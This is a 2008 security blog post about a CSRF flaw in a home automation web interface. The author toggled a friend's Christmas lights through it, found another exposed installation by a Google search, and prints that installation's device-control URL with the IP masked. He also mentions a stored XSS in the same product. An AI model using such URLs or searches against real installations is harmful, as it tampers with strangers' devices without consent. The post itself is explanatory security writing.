deep inside: security and tools

Every-day's CSRF: Sorry, I turned off your christmas tree lights

Today, a friend of mine was really proud to show me the [Home Automation][]installation he just bought. Well, since he lives in France and I am in DC, heshowed me the web interface that was able to control the lights etc. in hishouse. As he wanted to test this domotic system, he only plugged his Christmastree lights on the system.

It was so easy to make it blinking with a simple script that I showed it to him. So well, every 5 seconds, it would change thestate.

Anyway, this CSRF is not a bigdeal for him since it's only the Christmas tree lights, it's only a temporaryinstallation and well, it's fun. But after a simple google search, I foundanother site like my friend's. The URL that Google return is:

http://XXX.XXX.XXX.XXX:88/control_exe.htm;3;1;ON

Which is basically turning on some device... :)

Also, not only this application has tons of CSRF, but also a nice stored XSSwhich let you do whatever you want with it! And btw, since the Google Robotreported this, it means that every time that it crawls the website (or atleast, reaches that particular URL), it will set the device ON :)

Web security enters your house, f34rs!

All entries

  1. February 2013 — RSA 2013 speaking session
  2. February 2013 — HTML5 tokenization visualization
  3. September 2011 — PHP, Variable variables, Oh my!
  4. July 2011 — Dissection of a SQL injection challenge
  5. January 2010 — Yes, we need a standard to evaluate SAST, but it ain't easy...
  6. November 2009 — Data driven factory: I give you data, you give me an object...
  7. June 2009 — NIST Static Analysis Tool Exposition special publication released
  8. December 2008 — Every-day's CSRF: Sorry, I turned off your christmas tree lights
  9. August 2008 — Why the "line of code" is indeed a good metric
  10. May 2008 — Accelerate the convergence to the bug: Running the test in 16-bit
  11. February 2008 — Code review tools: the missing link (so far)
  12. January 2008 — Talk: Problems and solutions for testing web application security scanners
  13. October 2007 — IE6 And IE7 don't have compatible CSS tricks
  14. September 2007 — Source Code Obfuscation
  15. February 2007 — The return of the SVG XSS
  16. February 2007 — How you should design a test suite for Web Apps Scanners
  17. January 2007 — Test Suites for Web Application Scanners
  18. December 2006 — SVG Files: XSS attacks